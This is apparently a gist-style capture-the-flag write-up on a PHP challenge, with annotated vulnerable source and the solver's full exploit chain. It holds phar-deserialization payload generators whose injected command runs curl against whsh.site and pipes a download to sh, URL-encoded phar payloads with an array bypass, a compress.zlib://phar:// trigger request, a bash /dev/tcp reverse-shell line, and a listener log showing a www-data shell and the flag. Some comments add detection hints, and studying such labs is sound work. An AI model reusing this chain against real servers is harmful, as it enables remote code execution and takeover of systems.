Created
January 12, 2020 14:36
| <?php if (isset($_GET['info'])) die(phpinfo()); /* Challenge source as served (deliberately vulnerable). Any request carrying ?info gets the phpinfo() dump; no authentication check precedes it, so the runtime configuration is disclosed to every caller. */ | |
| $filename = $_GET['f']??"kophp.php"; /* The path read on the last line comes straight from the f query parameter, so the caller chooses it, stream-wrapper scheme included. */ | |
| if (isset($_GET['c']) && strlen($_GET['c']) < 87) /* The length limit only means something for a string; nothing here checks is_string(), and the author's note further down the page relies on sending c as an array. */ | |
| { | |
| $f = "/tmp/" . uniqid(rand() , true); /* Scratch file name: /tmp/ followed by uniqid() with a rand() prefix and extra entropy. */ | |
| if (stripos($_GET['c'], "path")) exit(); /* stripos() returns the match offset, so a hit at offset 0 is falsy and is not rejected; a strict comparison against false is the robust form. */ | |
| file_put_contents($f, $_GET['c']); /* Request data is written to disk with no further content validation. */ | |
| die($f); /* The generated path is echoed back, so the random name does not hide the file location from the requester. */ | |
| } | |
| strtolower($filename[0]) == "p" ? die("Bad 🍊!") : die(htmlspecialchars(file_get_contents($filename))); /* The only gate on $filename is a first character other than p or P; a path that begins with another wrapper (the compress.zlib:// prefix in the curl line further down) passes it and still reaches phar://. Before PHP 8.0, a read on a phar:// path unserializes the archive metadata, so an allow-list of readable files is the safer design. */ | |
Author
honor2016tw
commented
Jan 12, 2020
Author
<?php
/**
 * Class whose destructor shells out to `rm` with the value of $path.
 *
 * Presumably this is the class loaded on the target (the page does not say
 * where the file lives; TODO confirm). The command line is built by plain
 * string concatenation, so the shell interprets whatever $path holds. With
 * the default value that is only a glob, but a destructor like this becomes
 * a deserialization gadget as soon as an instance can be created from
 * attacker-supplied serialized data, because private properties are restored
 * as-is. Deleting files with glob() and unlink() instead of a shell command
 * removes the gadget.
 */
class InitialOperation
{
private $path = "/tmp/*";
// Runs whenever an instance is destroyed, including instances that were
// created by unserialize() rather than by the code in this file.
function __destruct()
{
// $this->path reaches the shell without escaping or validation.
exec("rm " . $this->path);
}
}
// The instance is never stored, so its destructor runs with the default path.
new InitialOperation();
Author
<?php
// Proof-of-concept generator from the write-up: it builds a phar archive
// whose metadata is a serialized InitialOperation object, then prints the
// archive URL-encoded.
//
// For defenders: the archive is recognisable by the __HALT_COMPILER(); stub
// and by the GBMB marker at the end of the signature, both visible in the
// encoded request shown further down the page. Request parameters or
// uploads carrying those markers, and path parameters containing phar://,
// are worth alerting on.

// Stand-in for the target's class. Only the class name and the private
// $path property matter, since those are what the serialized metadata names.
class InitialOperation {
// Chosen so that the target's "rm " . $this->path concatenation yields a
// second shell command. The observable effect is an outbound HTTP request
// from the web server account to an external host.
private $path = ";curl whsh.site:5269";
}
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$o = new InitialOperation();
// The object is stored serialized in the archive metadata. Before PHP 8.0 a
// file operation on a phar:// path unserializes that metadata, which is why
// the file_get_contents() call in the challenge source is enough to
// instantiate the class and later run its destructor.
$phar->setMetadata($o);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
echo urlencode(file_get_contents("phar.phar"));
?>
Author
Use an array for `c` to get past the strlen() and stripos() checks that guard file_put_contents():
/?c[]=%3C%3Fphp+__HALT_COMPILER%28%29%3B+%3F%3E%0D%0A%8C%00%00%00%01%00%00%00%11%00%00%00%01%00%00%00%00%00V%00%00%00O%3A16%3A%22InitialOperation%22%3A1%3A%7Bs%3A22%3A%22%00InitialOperation%00path%22%3Bs%3A20%3A%22%3Bcurl+whsh.site%3A5269%22%3B%7D%08%00%00%00test.txt%04%00%00%00%E3U%1B%5E%04%00%00%00%0C%7E%7F%D8%A4%01%00%00%00%00%00%00test+%60%FF%94%8Ch%81E7%E0c%07%7ER%F7Z%9871%CA%02%00%00%00GBMB
/tmp/10956229125e1b5601bfe5a5.15651717
Author
curl -k https://eductf.zoolab.org:28443/?f=compress.zlib://phar:///tmp/10956229125e1b5601bfe5a5.15651717
Author
<?php
// Second generator from the write-up. It has the same structure as the
// first one on this page (a phar archive whose metadata is a serialized
// InitialOperation object), and only the $path value differs.
//
// For defenders: the end state shown in the transcript below is an
// interactive shell running as www-data. A web server process spawning
// sh or bash, or opening outbound connections to unfamiliar hosts, is the
// behaviour to detect. Egress filtering on the web tier limits the impact.

// Stand-in for the target's class. The class name and the private $path
// property are what the serialized metadata refers to.
class InitialOperation {
// Here the fetched response is piped to sh, so remote content would run as
// the web server account once the target's destructor concatenates this
// value into its rm command.
// NOTE(review): the encoded request further down carries the string without
// spaces around the pipe (serialized length 27), so it was generated from a
// slightly different value than the one shown here.
private $path = ";curl whsh.site:808/test | sh";
}
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$o = new InitialOperation();
// Serialized into the archive metadata. PHP versions before 8.0 unserialize
// it on any file operation that touches the archive through phar://.
$phar->setMetadata($o);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
echo urlencode(file_get_contents("phar.phar"));
?>
Author
test
bash -c 'bash -i >& /dev/tcp/whsh.site/5269 0>&1'
Author
/?c[]=%3C%3Fphp+__HALT_COMPILER%28%29%3B+%3F%3E%0D%0A%93%00%00%00%01%00%00%00%11%00%00%00%01%00%00%00%00%00%5D%00%00%00O%3A16%3A%22InitialOperation%22%3A1%3A%7Bs%3A22%3A%22%00InitialOperation%00path%22%3Bs%3A27%3A%22%3Bcurl+whsh.site%3A808%2Ftest%7Csh%22%3B%7D%08%00%00%00test.txt%04%00%00%00%B5X%1B%5E%04%00%00%00%0C%7E%7F%D8%A4%01%00%00%00%00%00%00test%C0%10%9B%8E%89h7%F8%A5%CBuN%C6s%5E%F8%B6hW%1F%02%00%00%00GBMB
/tmp/14955586845e1b58ddcfbd91.94985006
Author
root@whcsc-ubuntu-16:~# nc -kvl 5269
Listening on [0.0.0.0] (family 0, port 5269)
Connection from [140.113.203.209] port 5269 [tcp/xmpp-server] accepted (family 2, sport 39480)
bash: cannot set terminal process group (32): Inappropriate ioctl for device
bash: no job control in this shell
www-data@05ed21fb2848:/$ ls
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
readflag
readflag.c
root
run
sbin
srv
sys
tmp
usr
var
why_the_flag_name_is_so_weird
Author
www-data@05ed21fb2848:/$ ./readflag
./readflag
FLAG{oh_php7.4_preload_so__coool!}